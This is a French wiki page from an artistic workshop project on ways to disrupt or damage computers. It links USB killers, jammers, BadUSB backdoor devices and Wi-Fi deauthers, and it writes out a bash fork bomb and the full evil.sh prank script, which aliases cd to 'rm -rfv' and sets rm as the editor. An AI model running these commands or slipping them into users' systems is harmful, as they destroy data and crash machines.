Ou comment altérer le fonctionnement d'un ordinateur de façon malicieuse :)

Les ordinateurs étant susceptibles un jour ou l'autre d'échapper à notre contrôle, il peut être utile de connaître quelques façons de contrevenir à leur bon fonctionnement

Ce projet a des vocations avant tout artistiques et humoristiques, il convient de ne JAMAIS maltraiter un ordinateur qui ne vous appartient pas, et de CONSIDÉRER le coût environnemental de productions de ces appareils afin de tenter de les utiliser le plus longtemps possible

A retrouver, une présentation introductive à un atelier proposé à Nantes / Stéréolux duper-le-numerique-2019.odpduper-le-numerique-2019.pdf

Une autre avec quelques compléments pour une présentation à des étudiants en géographie à la Sorbonne detruire_ou_alterer_le_fonctionnement_des_machines_numeriques-2022.pdf

Bon, bien sur il est toujours possible de maltraiter physiquement un ordinateur …

• Datacenter où le bruit du système anti incendie a cassé les disques durs des serveurs http://motherboard.vice.com/read/a-loud-sound-just-shut-down-a-banks-data-center-for-10-hours

Relier le + et le - sur un port USB femelle …

• Le PC-B-Gone http://virtualabs.fr/Apres-le-TV-B-Gone-le-PC-B-Gone
• Le PCB https://github.com/openitproject/pc-b-gone

• Le premier prototype http://kukuruku.co/hub/diy/usb-killer
• Le produit vendu packagé https://www.usbkill.com/usb-killer/8-usb-killer.html

• https://medium.com/@_MG_/mr-self-destruct-7986998f32a8

• Test d'objets connectés https://gattack.io/
• Faire des jammers DIY

Téléphone DECT et GSM, GPS, WiFi, bluetooth, …

• Un proto chez Ladyada http://www.ladyada.net/make/wavebubble/index.html

• Voir la page Computer-b-gone_Teensy
• Voir également ce projet http://www.instructables.com/id/PC-B-Gone-V1/
• Clef USB programmable http://www.semageek.com/malduino-une-cle-usb-pour-realiser-des-injection-clavier/
• Programmation en python Evil Key - Cloud Controlled “Rubber Ducky” - Python Powered Smart BadUSB, HID

USBdriveby is a device you stylishly wear around your neck which can quickly and covertly install a backdoor and override DNS settings on an unlocked machine via USB in a matter of seconds. It does this by emulating a keyboard and mouse, blindly typing controlled commands, flailing the mouse pointer around and weaponizing mouse clicks.

• http://samy.pl/usbdriveby/
• code https://github.com/samyk/usbdriveby

“FANGo” is a defense weapon against surveillance capitalism. Hidden under its appearance of mobile phone charger will be provided with a micro controller that takes control of the smartphone plugged in making queries to google, amazon and other search engines, launching videos in YouTube in order to deceive data brokers in their data capture process. http://martinnadal.eu/fango/

Là aussi, il y a toute la cohorte des virus programmés à mauvais escient, on s'intéressera plutôt aux créations artistiques et astucieuses

Voir le projet ESP8266 Deauther 2.0 https://github.com/spacehuhn/esp8266_deauther basée sur le mini serveur ESP8266 qui tient dans la poche. La liste des appareils compatibles On peut installer les programmes via l'IDE d'Arduino ou acheter une version pré-fabriquée avec de chouettes options comme l'écran LCD intégré, voir https://dstike.com et https://maltronics.com/ et d'autres “gadgets” chez https://shop.hak5.org/products/

Voir aussi ce projet artistique contre la surveillance urbaine (dans les magasins) en ville https://0xacab.org/kippleface/footfall-amulets

Voir la page wiki dédiée pour l'installation et l'utilisation

Projet Skylift : SkyLift is a zero-click Wi-Fi geolocation spoofing device that virtually relocates visitors to Julian Assange’s residence at the Ecuadorian Embassy in London.

La fork bomb est une attaque à l'encontre d'un système informatique qui consiste à multiplier les programmes informatiques exécutés simultanément sur celui-ci, selon le principe qu'un processus parent donne naissance à un processus enfant qui lui-même devient parent … jusqu'à l'agonie de l'ordinateur du fait de la surcharge

Une de mes préférées :

:(){ :|:& };:

• La page de l'auteur https://jaromil.dyne.org/journal/forkbomb_art.html
• Explications http://www.cyberciti.biz/faq/understanding-bash-fork-bomb/
• Une liste de forkbomb sur wikipedia https://fr.wikipedia.org/wiki/Fork_bomb

En intégrant la chaîne EICAR qui est utilisée pour tester les antivirus dans un QR code, une idée simple, mais efficace

Le hic, c’est que ces appareils ne filtrent pas toujours très bien l’information qu’ils reçoivent. Ainsi, à l’occasion de la conférence DEF CON 29, le hacker Richard Henderson a montré qu’il était possible de faire planter certains lecteurs en leur montrant un code QR qui encode la chaîne de caractères suivante :

  X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

• https://www.01net.com/actualites/des-hackers-font-planter-des-lecteurs-de-code-barre-avec-un-qr-code-2046788.html

• Daemon qui détecte quand on enlève une clef usb et éteint l'ordi https://github.com/area31/dfss

Comment rendre un utilisateur fou en altérant les fonctions de base de l'ordinateur : on répond “non” et l'ordinateur fait “oui” par exemple

• Quelques scripts malicieux https://github.com/mathiasbynens/evil.sh

#!/usr/bin/env bash
# evil.sh — https://mths.be/evil.sh
 
# Set `rm` as the default editor.
export EDITOR=/bin/rm;
 
# Make Tab send the delete key.
tset -Qe $'\t';
 
# Randomly make the shell exit whenever a command has a non-zero exit status.
((RANDOM % 10)) || set -o errexit;
 
# Let `cat` swallow every input and never return anything.
alias cat=true;
 
# Use a random sort option whenever `ls` is invoked.
function ls { command ls -$(opts="frStu"; echo ${opts:$((RANDOM % ${#opts})):1}) "$@"; }
 
# Delete directories instead of entering them.
alias cd='rm -rfv';
 
# Shut down the computer instead of running a command with super-user rights.
alias sudo='sudo shutdown -P now';

• Un paquet à installer sur votre Linux qui fait que si vous tapez une commande erronée, le disque dur de votre machine sera effacé avec un “rm -rf /” : https://qntm.org/suicide

• Perturbations par court-circuit du réseau 220v
• Perturbations par clefs USB de systèmes informatiques
• Perturbations par ondes sonores d'un Data Center

• https://lab401.com
• https://shop.hak5.org/products/
• https://dstike.com
• https://maltronics.com/

• 102 ways to kill your computer http://www.theregister.co.uk/2002/10/11/102_ways_to_kill_your/
• How To Destroy Your Computer http://www.dansdata.com/sbs3.htm
• Divers hack astucieux https://samy.pl
• Diverses techniques pour subtiliser des informations en détournant des périphériques (ici la RAM transformée en carte wifi)
• Des hacks diaboliques https://mg.lol/